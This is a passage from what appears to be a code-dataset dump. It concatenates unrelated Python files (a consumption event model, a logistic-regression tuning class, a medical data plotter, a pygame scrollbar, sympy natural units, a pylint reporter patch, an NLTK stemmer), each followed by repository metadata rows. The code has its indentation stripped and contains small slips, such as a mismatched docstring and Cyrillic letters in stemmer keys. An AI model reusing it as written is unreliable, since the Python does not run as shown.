for i in range(len(self.events)+1):
p_data = period_data(self.data, self.events, i)
self.periods.append(self.model(p_data))
def add_event(self, ev):
self.events.append(ev)
self.events.sort(key=lambda x: x.date)
self._recalculate()
def prediction(self, independent_data):
for i in range(len(self.periods)):
p_data = period_data(independent_data, self.events, i)
p_pred = self.periods[i].prediction(p_data)
if i == 0:
result = p_pred
else:
result = np.concatenate((result, p_pred))
return result
def simulation(self, independent_data):
for i in range(len(self.periods)):
p_data = period_data(independent_data, self.events, i)
p_sim = self.periods[i].simulation(p_data)
if i == 0:
result = p_sim
else:
result = np.concatenate((result, p_sim))
return result
def residuals(self, independent_data):
pred = self.prediction(independent_data)
return independent_data['consumption'] - pred
def parameters(self):
result = []
for p in self.periods: result.append(p.parameters())
return result
if __name__ == "__main__":
import matplotlib.pyplot as plt
from ConsumptionModels import Constant, TwoParameterModel
from DataAccess import RandomDataFactory
f = RandomDataFactory()
data = f.randomData(1000)
em = event_model(data, Constant)
for d in range(8):
em.add_event(event(200000.0 * (d + 1)))
pred = em.prediction(data)
res = em.residuals(data)
# print em.parameters()
plt.plot(data['date'], data['consumption'])
plt.plot(data['date'], res)
plt.plot(data['date'], pred)
plt.show()
| 34.150943 | 110 | 0.625138 | 487 | 3,620 | 4.507187 | 0.232033 | 0.032802 | 0.031891 | 0.020046 | 0.217768 | 0.176765 | 0.121185 | 0.07836 | 0.07836 | 0.07836 | 0 | 0.007766 | 0.253039 | 3,620 | 105 | 111 | 34.47619 | 0.803994 | 0.112431 | 0 | 0.195122 | 0 | 0 | 0.034796 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.134146 | false | 0.012195 | 0.04878 | 0 | 0.304878 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eb3fe8d61ca018e169ea0f932496e2418d8f490 | 2,388 | py | Python | muscle_tuning/logisticregression_tuning.py | c60evaporator/param_tuning_utility | 8518b76369dcc918172a87ab4c975ee3a12f7045 | [
"BSD-3-Clause"
] | null | null | null | muscle_tuning/logisticregression_tuning.py | c60evaporator/param_tuning_utility | 8518b76369dcc918172a87ab4c975ee3a12f7045 | [
"BSD-3-Clause"
] | null | null | null | muscle_tuning/logisticregression_tuning.py | c60evaporator/param_tuning_utility | 8518b76369dcc918172a87ab4c975ee3a12f7045 | [
"BSD-3-Clause"
] | null | null | null | from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
import numpy as np
from .param_tuning import ParamTuning
class LogisticRegressionTuning(ParamTuning):
"""
サポートベクター分類チューニング用クラス
"""
# 共通定数
SEED = 42 # デフォルト乱数シード
SEEDS = [42, 43, 44, 45, 46, 47, 48, 49, 50, 51] # デフォルト複数乱数シード
CV_NUM = 5 # 最適化時のクロスバリデーションのデフォルト分割数
# 学習器のインスタンス (標準化+ロジスティック回帰のパイプライン)
ESTIMATOR = Pipeline([("scaler", StandardScaler()), ("logr", LogisticRegression())])
# 学習時のパラメータのデフォルト値
FIT_PARAMS = {}
# 最適化で最大化するデフォルト評価指標('neg_log_loss', 'roc_auc', 'roc_auc_ovr'など)
SCORING = 'neg_log_loss'
# 最適化対象外パラメータ
NOT_OPT_PARAMS = {'penalty': 'l2', # 正則化のペナルティ ('l1', 'l2', 'elasticnet')
'solver': 'lbfgs' # 学習に使用するソルバー ('newton-cg', 'lbfgs', 'liblinear', 'sag', 'saga')
}
# グリッドサーチ用パラメータ
CV_PARAMS_GRID = {'C': np.logspace(-2, 3, 21).tolist() # 正則化項C (小さいと未学習寄り、大きいと過学習寄り)
}
# ランダムサーチ用パラメータ
N_ITER_RANDOM = 25 # ランダムサーチの試行数
CV_PARAMS_RANDOM = {'C': np.logspace(-2, 3, 26).tolist()
}
# ベイズ最適化用パラメータ
N_ITER_BAYES = 20 # BayesianOptimizationの試行数
INIT_POINTS = 5 # BayesianOptimizationの初期観測点の個数(ランダムな探索を何回行うか)
ACQ = 'ei' # BayesianOptimizationの獲得関数(https://ohke.hateblo.jp/entry/2018/08/04/230000)
N_ITER_OPTUNA = 25 # Optunaの試行数
BAYES_PARAMS = {'C': (0.01, 1000)
}
INT_PARAMS = []
# 範囲選択検証曲線用パラメータ範囲
VALIDATION_CURVE_PARAMS = {'C': np.logspace(-3, 4, 15).tolist()
}
# 検証曲線表示等で使用するパラメータのスケール('linear', 'log')
PARAM_SCALES = {'C': 'log',
'l1_ratio': 'linear'
}
def _not_opt_param_generation(self, src_not_opt_params, seed, scoring):
"""
チューニング対象外パラメータの生成(seed追加、loglossかつSVRのときのprobablity設定など)
Parameters
----------
src_not_opt_params : Dict
処理前のチューニング対象外パラメータ
seed : int
乱数シード
scoring : str
最適化で最大化する評価指標
"""
# 乱数シードをnot_opt_paramsのrandom_state引数に追加
if 'random_state' in src_not_opt_params:
src_not_opt_params['random_state'] = seed
return src_not_opt_params | 32.27027 | 105 | 0.600503 | 233 | 2,388 | 5.922747 | 0.613734 | 0.030435 | 0.052174 | 0.054348 | 0.018841 | 0 | 0 | 0 | 0 | 0 | 0 | 0.039365 | 0.28727 | 2,388 | 74 | 106 | 32.27027 | 0.771445 | 0.341709 | 0 | 0 | 0 | 0 | 0.0625 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027778 | false | 0 | 0.138889 | 0 | 0.722222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eb4e2799d377de7e9d39b8148f9aadd7b2d4071 | 1,578 | py | Python | main.py | Marques004/Medical-Data-Visualizer | 1c096cc3f7732b532b94a60021f102f15680f98c | [
"MIT"
] | null | null | null | main.py | Marques004/Medical-Data-Visualizer | 1c096cc3f7732b532b94a60021f102f15680f98c | [
"MIT"
] | null | null | null | main.py | Marques004/Medical-Data-Visualizer | 1c096cc3f7732b532b94a60021f102f15680f98c | [
"MIT"
] | null | null | null | import os
os.environ['MPLCONFIGDIR'] = os.getcwd() + "/configs/"
import matplotlib
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import numpy as np
df = pd.read_csv('medical_examination.csv')
df['overweight'] = (df['weight'] / (df['height']/100)**2).apply(lambda x: 1 if x > 25 else 0)
df['cholesterol'] = df['cholesterol'].apply(lambda x: 0 if x == 1 else 1)
df['gluc'] = df['gluc'].apply(lambda x: 0 if x == 1 else 1)
def draw_cat_plot():
df_cat = pd.melt(df, id_vars = 'cardio', var_name = 'variable', value_vars = ['alco', 'active','cholesterol', 'gluc', 'overweight','smoke'])
df_cat = pd.melt(df, var_name = 'variable', value_vars = ['active','alco','cholesterol', 'gluc','overweight','smoke'], id_vars = 'cardio')
# Desenha o catplot com 'sns.catplot()'
fig = sns.catplot(data=df_cat, kind="count", x="variable",hue="value", col="cardio").set_axis_labels("variable", "total")
fig = fig.fig
fig.savefig('catplot.png')
return fig
def draw_heat_map():
# limpa a Data
df_heat = df[(df['ap_lo']<=df['ap_hi']) &
(df['height'] >= df['height'].quantile(0.025))&
(df['height'] <= df['height'].quantile(0.975))&
(df['weight'] >= df['weight'].quantile(0.025))&
(df['weight'] <= df['weight'].quantile(0.975))
]
corr = df_heat.corr()
mask = np.triu(corr)
fig, ax = plt.subplots(figsize=(7, 5))
sns.heatmap(corr,mask=mask, fmt='.1f',vmax=.3, linewidths=.5,square=True, cbar_kws = {'shrink':0.5},annot=True, center=0)
fig.savefig('heatmap.png')
return fig
| 33.574468 | 144 | 0.627376 | 240 | 1,578 | 4.033333 | 0.4125 | 0.041322 | 0.030992 | 0.02686 | 0.225207 | 0.14876 | 0.045455 | 0.045455 | 0.045455 | 0 | 0 | 0.028788 | 0.163498 | 1,578 | 46 | 145 | 34.304348 | 0.704545 | 0.031686 | 0 | 0.064516 | 0 | 0 | 0.216393 | 0.015082 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064516 | false | 0 | 0.193548 | 0 | 0.322581 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eb5d6396e2a31bb9fbff7585432ac8ecb96f4b0 | 2,785 | py | Python | Gadakeco_Code/src/gui/guiscrollbar.py | YueNing/gadakeco-ml | ec64703d7d6582d867b873f333b230d32b0e1d1a | [
"MIT"
] | 3 | 2019-07-26T15:47:23.000Z | 2019-10-02T13:39:49.000Z | Gadakeco_Code/src/gui/guiscrollbar.py | YueNing/gadakeco-ml | ec64703d7d6582d867b873f333b230d32b0e1d1a | [
"MIT"
] | 5 | 2019-07-26T20:32:50.000Z | 2019-07-26T20:48:34.000Z | Gadakeco_Code/src/gui/guiscrollbar.py | YueNing/gadakeco-neat | ec64703d7d6582d867b873f333b230d32b0e1d1a | [
"MIT"
] | 1 | 2019-07-28T21:51:19.000Z | 2019-07-28T21:51:19.000Z | import pygame
from gui.guielement import GuiElement
HORIZONTAL = 0
VERTICAL = 1
class GuiScrollbar(GuiElement):
"""
scrollbar / slider
"""
def __init__(self, x, y, width, height, fontObj, value=0.0, orientation=HORIZONTAL, barLength=30):
GuiElement.__init__(self, x, y, width, height, fontObj)
self._value = value
self._orientation = orientation
self._barLength = barLength
self.setEventTypes(pygame.MOUSEBUTTONDOWN, pygame.MOUSEBUTTONUP, pygame.MOUSEMOTION)
self._grabbed = False
self._func = None
def getValue(self):
return self._value
def setValue(self, value):
self._value = min(max(value, 0), 1)
def connect(self, func, *params):
self._func = func
self._params = params
return self
def update(self, t):
pass
def canHandleEvent(self, event):
return GuiElement.canHandleEvent(self, event)
def handleEvent(self, event):
if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
if self._aabb.contains(*pygame.mouse.get_pos()):
self._grabbed = True
return True
elif event.type == pygame.MOUSEBUTTONUP and event.button == 1:
if self._grabbed:
self._grabbed = False
if self._func != None:
self._func(*self._params)
return True
elif event.type == pygame.MOUSEMOTION:
if self._grabbed:
if self._orientation == HORIZONTAL:
self.setValue(
(event.pos[0] - self._barLength / 2.0 - self.getX()) / (self.getWidth() - self._barLength))
else:
self.setValue(
(event.pos[1] - self._barLength / 2.0 - self.getY()) / (self.getHeight() - self._barLength))
return True
return False
def draw(self, screen):
screen.fill((50, 50, 50), self.getRect())
if self._orientation == HORIZONTAL:
y = self.getY() + self.getHeight() / 2.0 - 1
screen.fill((255, 255, 255), (self.getX(), y, self.getWidth(), 2))
barX = self.getX() + self._value * (self.getWidth() - self._barLength)
screen.fill((100, 200, 255), (barX, self.getY(), self._barLength, self.getHeight()))
else:
x = self.getX() + self.getWidth() / 2.0 - 1
screen.fill((255, 255, 255), (x, self.getY(), 2, self.getHeight()))
barY = self.getY() + self._value * (self.getHeight() - self._barLength)
screen.fill((100, 200, 255), (self.getX(), barY, self.getWidth(), self._barLength))
| 36.168831 | 117 | 0.549013 | 300 | 2,785 | 4.97 | 0.243333 | 0.078471 | 0.032193 | 0.050302 | 0.202549 | 0.177062 | 0.109993 | 0.02951 | 0 | 0 | 0 | 0.035219 | 0.32711 | 2,785 | 76 | 118 | 36.644737 | 0.760406 | 0.006463 | 0 | 0.224138 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.137931 | false | 0.017241 | 0.034483 | 0.034483 | 0.310345 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eb61d8e3e5b97341a3cbfca6e4c058994f2fde4 | 1,785 | py | Python | sympy/physics/unitsystems/systems/natural.py | shipci/sympy | 4b59927bed992b980c9b3faac01becb36feef26b | [
"BSD-3-Clause"
] | 4 | 2018-07-04T17:20:12.000Z | 2019-07-14T18:07:25.000Z | sympy/physics/unitsystems/systems/natural.py | curzel-it/KiPyCalc | 909c783d5e6967ea58ca93f875106d8a8e3ca5db | [
"MIT"
] | 7 | 2017-05-01T14:15:32.000Z | 2017-09-06T20:44:24.000Z | sympy/physics/unitsystems/systems/natural.py | curzel-it/KiPyCalc | 909c783d5e6967ea58ca93f875106d8a8e3ca5db | [
"MIT"
] | 3 | 2015-04-18T22:33:32.000Z | 2015-09-23T06:45:07.000Z | # -*- coding: utf-8 -*-
# -*- coding: utf-8 -*-
"""
Naturalunit system.
The natural system comes from "setting c = 1, hbar = 1". From the computer
point of view it means that we use velocity and action instead of length and
time. Moreover instead of mass we use energy.
"""
from __future__ import division
from sympy.physics.unitsystems.dimensions import Dimension, DimensionSystem
from sympy.physics.unitsystems.units import Unit, Constant, UnitSystem
from sympy.physics.unitsystems.prefixes import PREFIXES, prefix_unit
# base dimensions
action = Dimension(name="action", symbol="A", length=2, mass=1, time=-1)
energy = Dimension(name="energy", symbol="E", length=2, mass=1, time=-2)
velocity = Dimension(name="velocity", symbol="V", length=1, time=-1)
# derived dimensions
length = Dimension(name="length", symbol="L", length=1)
mass = Dimension(name="mass", symbol="M", mass=1)
time = Dimension(name="time", symbol="T", time=1)
acceleration = Dimension(name="acceleration", length=1, time=-2)
momentum = Dimension(name="momentum", mass=1, length=1, time=-1)
force = Dimension(name="force", symbol="F", mass=1, length=1, time=-2)
power = Dimension(name="power", length=2, mass=1, time=-3)
frequency = Dimension(name="frequency", symbol="f", time=-1)
dims = (length, mass, time, momentum, force, energy, power, frequency)
# dimension system
natural_dim = DimensionSystem(base=(action, energy, velocity), dims=dims,
name="Natural system")
# base units
hbar = Constant(action, factor=1.05457266e-34, abbrev="hbar")
eV = Unit(energy, factor=1.60219e-19, abbrev="eV")
c = Constant(velocity, factor=299792458, abbrev="c")
units = prefix_unit(eV, PREFIXES)
# unit system
natural = UnitSystem(base=(hbar, eV, c), units=units, name="Natural system")
| 37.1875 | 76 | 0.712605 | 252 | 1,785 | 5.019841 | 0.293651 | 0.113043 | 0.028459 | 0.064032 | 0.063241 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03553 | 0.132773 | 1,785 | 47 | 77 | 37.978723 | 0.781654 | 0.189356 | 0 | 0 | 0 | 0 | 0.080949 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.173913 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eb7a596233dad4bd13e3f014ef38f1b7c4660a5 | 867 | py | Python | git_pylint/reporter.py | vcoder4c/git_pylint | 9e72e725152d59c1f94663c8ca1e841615a4b6cd | [
"MIT"
] | 1 | 2020-08-29T19:23:06.000Z | 2020-08-29T19:23:06.000Z | git_pylint/reporter.py | vcoder4c/git_pylint | 9e72e725152d59c1f94663c8ca1e841615a4b6cd | [
"MIT"
] | null | null | null | git_pylint/reporter.py | vcoder4c/git_pylint | 9e72e725152d59c1f94663c8ca1e841615a4b6cd | [
"MIT"
] | null | null | null | from pylint.reporters.json import JSONReporter
def json_reporter_handle_message(self, msg):
"""Manage message of different type and in the context of path."""
self.messages.append({
'path': msg.path,
'abspath': msg.abspath,
'line': msg.line,
'column': msg.column,
'module': msg.module,
'obj': msg.obj,
'msg': msg.msg,
'msg_id': msg.msg_id,
'symbol': msg.symbol,
'C': msg.C,
'category': msg.category,
})
JSONReporter.handle_message = json_reporter_handle_message
def output_lint_result(lint_result, msg_template):
lint_module = lint_result[0]['module']
if lint_module:
print("************* Module {module}".format(module=lint_module))
else:
print("************* ")
for msg in lint_result:
print(msg_template.format(**msg))
| 27.967742 | 73 | 0.600923 | 105 | 867 | 4.780952 | 0.4 | 0.047809 | 0.071713 | 0.099602 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00152 | 0.241061 | 867 | 30 | 74 | 28.9 | 0.761398 | 0.069204 | 0 | 0 | 0 | 0 | 0.128589 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.041667 | 0 | 0.125 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eba32c6fbf4ca5fdda513dc3cc28ee4369367a4 | 12,492 | py | Python | partstem/__init__.py | AndreyPerelygin/partstem | dacd0537aa2ddf8ac85fd28fc337dd9f0e8235a4 | [
"Apache-2.0"
] | null | null | null | partstem/__init__.py | AndreyPerelygin/partstem | dacd0537aa2ddf8ac85fd28fc337dd9f0e8235a4 | [
"Apache-2.0"
] | null | null | null | partstem/__init__.py | AndreyPerelygin/partstem | dacd0537aa2ddf8ac85fd28fc337dd9f0e8235a4 | [
"Apache-2.0"
] | null | null | null | from nltk.stem import SnowballStemmer
from nltk.stem.api import StemmerI
import nltk
import json
class ParticleStemmer(SnowballStemmer):
def __init__(self, language="english", ignore_stopwords=False, suffix_rule_list={}):
super().__init__(language=language, ignore_stopwords=ignore_stopwords)
if language == "english":
self.stemmer._EnglishStemmer__special_words.update({
"experiment":"experiment",
"experimented":"experiment",
"experimenting":"experiment",
"experiments":"experiment",
'organization': 'organiz',
"organization's": 'organiz',
'organizational': 'organiz',
'organizationally': 'organiz',
'organizations': 'organiz',
'organize': 'organiz',
'organized': 'organiz',
'organizer': 'organiz',
'organizers': 'organiz',
'organizes': 'organiz',
'organizing': 'organiz',
'science': 'scient',
'sciences': 'scient',
'scientific': 'scient',
'scientifically': 'scient',
'scientist': 'scient',
'scientistic': 'scient',
'scientists': 'scient',
'animal': 'animal',
'animalism': 'animal',
'animalistic': 'animal',
'animalities': 'animal',
'animality': 'animal',
'animals': 'animal',
'customer': 'customer',
'ratability': 'rate',
'ratable': 'rate',
'ratably': 'rate',
'rate': 'rate',
'rateable': 'rate',
'rateably': 'rate',
'rated': 'rate',
'rater': 'rate',
'raters': 'rate',
'rates': 'rate',
'rating': 'rate',
'ratings': 'rate',
'ratio': 'rate',
'ratios': 'rate',
'ration': 'ration',
'rations': 'ration',
'rationed': 'ration',
'rationing': 'ration',
'ratification': 'ratifi',
'ratified': 'ratifi',
'ratifier': 'ratifi',
'ratifiers': 'ratifi',
'ratifies': 'ratifi',
'ratify': 'ratifi',
'ratifying': 'ratifi',
'rational': 'rational',
'rationale': 'rational',
'rationales': 'rational',
'rationalism': 'rational',
'rationalist': 'rational',
'rationalistic': 'rational',
'rationalistically': 'rational',
'rationalists': 'rational',
'rationalities': 'rational',
'rationality': 'rational',
'rationalization': 'rational',
'rationalizations': 'rational',
'rationalize': 'rational',
'rationalized': 'rational',
'rationalizer': 'rational',
'rationalizers': 'rational',
'rationalizes': 'rational',
'rationalizing': 'rational',
'rationally': 'rational',
'rationalness': 'rational',
'rationals': 'rational',
'ionization': 'ion',
'ionizer': 'ion',
'ionizers': 'ion',
'ionizations': 'ion',
'chemistry': 'chem',
'chemistries': 'chem',
'chemist': 'chem',
'chemists': 'chem',
'chemism': 'chem',
'chemisms': 'chem',
'stable': 'stabil',
'stabled': 'stabil',
'stableness': 'stabil',
'laboratorial': 'lab',
'laboratorially': 'lab',
'laboratorian': 'lab',
'laboratories': 'lab',
'laboratory': 'lab',
'preppie': 'prep',
'preppies': 'prep',
'preparation': 'prep',
'preparations': 'prep',
'preparatorily': 'prep',
'preparatory': 'prep',
'prepare': 'prep',
'prepared': 'prep',
'preparedness': 'prep',
'preparer': 'prep',
'preparers': 'prep',
'prepares': 'prep',
'preparing': 'prep',
'publication': 'publish',
'publications': 'publish',
'microfluidiсs': 'microfluid',
'microfluidiс': 'microfluid',
'transmissibility': 'transmitt',
'transmissible': 'transmitt',
'transmission': 'transmitt',
'transmissions': 'transmitt',
'transmissive': 'transmitt',
'transmitting': 'transmitt',
'transmitted': 'transmitt',
'transmit': 'transmitt',
'transmits': 'transmitt',
'compliant': 'complianc',
'compliantly': 'complianc',
'allergic': 'allergen',
'allergies': 'allergen',
'allergin': 'allergen',
'allergist': 'allergen',
'allergists': 'allergen',
'allergology': 'allergen',
'allergy': 'allergen',
'reproduction': 'reproduc',
'reproductions': 'reproduc',
'reproductive': 'reproduc',
'reproductively': 'reproduc',
'reproductiveness': 'reproduc',
'reproductivity': 'reproduc',
'filtrable': 'filter',
'filtrate': 'filter',
'filtrated': 'filter',
'filtrates': 'filter',
'filtrating': 'filter',
'filtration': 'filter',
'programmable': 'program',
'programmability': 'program',
'programme': 'program',
'programmata': 'program',
'programmatic': 'program',
'programmatically': 'program',
'programmer': 'program',
'programmers': 'program',
'programmes': 'program',
'formation': 'form',
'include': 'inclus',
'includes': 'inclus',
'including': 'inclus',
'included': 'inclus',
'dosage': 'dose',
'dosages': 'dose',
'seq':'sequenc',
'mineral':'mineral',
'minerals':'mineral',
'mineralization':'mineral',
'mineralize':'mineral',
'mineralized':'mineral',
'mineralizes':'mineral',
'mineralizing':'mineral',
'designate':'designat',
'designated':'designat',
'designates':'designat',
'designating':'designat',
'designation':'designat',
'designations':'designat',
'designative':'designat',
'designator':'designat',
'designment':'designat',
'genesys':'genesys',
'poly':'poly',
'sepsis':'sept',
'fabulist':'fabl',
'fabulists':'fabl',
'flautist':'flut',
'flautists':'flut',
'hygeist':'hygien',
'hygieist':'hygien',
'hygeists':'hygien',
'hygieists':'hygien',
'hypothesist':'hypothe',
'hypothesists':'hypothe',
'lutanist':'lute',
'lutanists':'lute',
'lutenist':'lute',
'lutenists':'lute',
'lutist':'lute',
'lutists':'lute',
'magisterial':'magist',
'magisterially':'magist',
'magisterialness':'magist',
'magistery':'magist',
'magistracies':'magist',
'magistracy':'magist',
'magistrateship':'magist',
'magistrature':'magist',
'mister':'mister',
'mr':'mister',
'misters':'mister',
'mistier':'misti',
'mistiest':'misti',
'piano':'pian',
'pianos':'pian',
'cellist':'cello',
'cellists':'cello',
'orthopaedic':'orthoped',
'orthopaedics':'orthoped',
'orthopaedist':'orthoped',
'orthopaedist':'orthoped',
'papist':'papa',
'papistries':'papa',
'papistry':'papa',
'papists':'papa',
'protista':'protist',
'rapist':'rape',
'rapists':'rape',
'scenarist':'scenario',
'scenarists':'scenario',
'tourism':'tourist',
'tourisms':'tourist',
'admin':'administr',
'administer':'administr',
'administered':'administr',
'administerial':'administr',
'administering':'administr',
'administerings':'administr',
'administers':'administr',
'administratrices':'administr',
'administratrix':'administr',
'characterless':'charact',
'charactery':'charact',
'geoscience': 'geoscient',
'geosciences': 'geoscient',
'geoscientific': 'geoscient',
'geoscientifically': 'geoscient',
'geoscientist': 'geoscient',
'geoscientistic': 'geoscient',
'geoscientists': 'geoscient',
'bioscience': 'bioscient',
'biosciences': 'bioscient',
'bioscientific': 'bioscient',
'bioscientifically': 'bioscient',
'bioscientist': 'bioscient',
'bioscientistic': 'bioscient',
'bioscientists': 'bioscient',
})
from partstem.word_list import word_list
self.word_list = word_list
self.word_list += nltk.corpus.words.words()
self.stem = self.__stem
self.suffix_rule_list = {
'ant': {"with": ['ation'], "exception": []},
'eti': {"with": ['ant', ''], "exception": []},
'or': {"with": ['ion'], "exception": []},
'um': {"with": ['a'], "exception": ["medium"]},
'a': {"with": ['um', 'ary+ '], "exception": ["media"]},
'ri': {"with": [' -ried', 'er', 'tes'], "exception": []},
'er': {"with": ['y'], "exception": []},
'al': {"with": ['us'], "exception": ["animal"]},
'us': {"with": ['al'], "exception": []},
'ifi': {"with": ['e'], "exception": ["modifi", "specifi"]},
'e': {"with": ['ification'], "exception": []},
'ion': {"with": ['e'], "exception": []},
'i': {"with": ['e', 'us', 'er', 'y+ ', 'y+ic'], "exception": ["ii"]},
'si': {"with": ['sis'], "exception": ["genesi"]},
's': {"with": ['sis'], "exception": ["genes"]},
't': {"with": ['sis'], "exception": []},
'z': {"with": ['sis'], "exception": []},
"ier": {"with": ["ying", ""], "exception": []},
"abl": {"with": ["e", "es", "ate", "ation", "ed", "en", "ies", ""], "exception": ["stabl", "capabl", "fabl", "arabl", "cabl", "constabl", "decasyllabl", "despicabl", "diabl", "disabl", "effabl", "enabl", "formidabl", "gabl", "gullabl", "impeccabl", "improbabl", "incapabl", "ineffabl", "inevitabl", "inviabl", "invariabl", "viabl", "variabl", "liabl", "probabl", "syllabl", "monosyllabl", "nonstabl", "unstabl", "uncapabl", "nonviabl", "parabl", "peccabl", "polysyllabl", "sabl", "permeabl", "semipermeabl", "tabl", "tenabl", "thermostabl", "timetabl", "unabl", "vegetabl", "vocabl", "worktabl"]},
"th": {"with": [""], "exception": []},
"atori": {"with": ["ation"], "exception": []},
"ori": {"with": ["ion"], "exception": []},
"ous": {"with": ["y", "", "e", "on", "ity"], "exception": []},
"ic": {"with": ["", "e"], "exception": ["sonic", "polic", "indic"]},
"iti": {"with": ["est+ification"], "exception": []},
"iz": {"with": ["ize", "izate"], "exception": []},
"at": {"with": ["atic", "ance"], "exception": []},
'if': {"with": ["ity+est", "e"], "exception": ["modif", "specif"]},
'ist': {"with": ['ism', 'ed', 'ical', 'y', 'ium', 'est', 'ic', 'e', 'o', 'al', 'a', ''], "exception": ["mist", "agonist", "assist", "list", "backlist", "ballist", "banist", "bannist", "barrist", "batist", "booklist", "canist", "casuist", "checklist", "christ", "cist", "fist", "closefist", "exist", "coexist", "consist", "delist", "desist", "enlist", "twist", "entwist", "feist", "filist", "foist", "gist", "grist","hagadist", "heist", "heurist", "hist", "hoist", "inconist", "insist", "intwist", "resist", "irresist", "joist", "kist", "legist", "logist", "magist", "maist", "minist", "modist", "moist", "specialist", "sophist", "statist", "waist", "pantywaist", "persist", "poltergeist", "preenlist", "preexist", "regist", "protist", "reenlist", "relist", "shirtwaist", "shist", "sinist", "subsist", "tourist", "underwaist", "unlist", "untwist", "whist", "wist", "wrist", "zeitgeist"]},
'ism': {"with": ['ist', 'ic', ''], "exception": ["tourism"]},
}
self.suffix_rule_list.update(suffix_rule_list)
self.suffix_list = sorted(list(self.suffix_rule_list.keys()), key=lambda x: -len(x))
def __stem(self, word, return_snowball=False):
if not word.startswith("improv"):
remove_suffix = {"isate":"izate", "isated":"izated", "isating":"izating", "isates":"izates"}
for key in remove_suffix.keys():
if word.endswith(key):
word = word[:-len(key)] + remove_suffix[key]
break
remove_suffix = {"ise":"ize", "ised":"ized", "ising":"izing", "ises":"izes"}
for key in remove_suffix.keys():
if word.endswith(key):
new_word = word[:-len(key)] + remove_suffix[key]
if new_word in self.word_list:
word = new_word
break
word = self.stemmer.stem(word)
stem_word = word
num = 0
if word not in list(self.stemmer._EnglishStemmer__special_words.keys()) + list(self.stemmer._EnglishStemmer__special_words.values()) and len(word) >= 3:
while num < len(self.suffix_list):
if stem_word.endswith(self.suffix_list[num]) and stem_word not in self.suffix_rule_list[self.suffix_list[num]]["exception"]:
without_suffix = stem_word[:-len(self.suffix_list[num])]
if len(without_suffix) == 0:
num += 1
continue
for el in self.suffix_rule_list[self.suffix_list[num]]["with"]:
el = el.replace("+", " ")
el = el.replace("-", " -") if "-" in el and " -" not in el else el
el = el.split(" ")
key = True
for el1 in el:
if not ((without_suffix + el1 in self.word_list and not el1.startswith("-")) or (without_suffix + el1.replace("-", "") not in self.word_list and el1.startswith("-"))):
key = False
break
if key:
stem_word = without_suffix
break
break
num += 1
return (stem_word, word) if return_snowball else stem_word if len(stem_word) >= 3 else word
partstem = ParticleStemmer()
| 35.896552 | 891 | 0.580692 | 1,132 | 12,492 | 6.338339 | 0.482332 | 0.015331 | 0.013659 | 0.012544 | 0.060627 | 0.045157 | 0.029826 | 0.021742 | 0.021742 | 0.011429 | 0 | 0.001082 | 0.186039 | 12,492 | 348 | 892 | 35.896552 | 0.704563 | 0 | 0 | 0.038576 | 0 | 0 | 0.458897 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.005935 | false | 0 | 0.014837 | 0 | 0.026706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ebd3cea58ee2b7b8500c146fbc4d43dc8ae98f8 | 6,340 | py | Python | analysis/Scripts/FunctionScript.py | data301-2021-summer2/group07-Project | 48e399c45cecbe2e596dbd214fa21b939f75e5ae | [
"MIT"
] | null | null | null | analysis/Scripts/FunctionScript.py | data301-2021-summer2/group07-Project | 48e399c45cecbe2e596dbd214fa21b939f75e5ae | [
"MIT"
] | 1 | 2021-08-06T11:01:27.000Z | 2021-08-16T05:20:02.000Z | analysis/Scripts/FunctionScript.py | data301-2021-summer2/group07-Project | 48e399c45cecbe2e596dbd214fa21b939f75e5ae | [
"MIT"
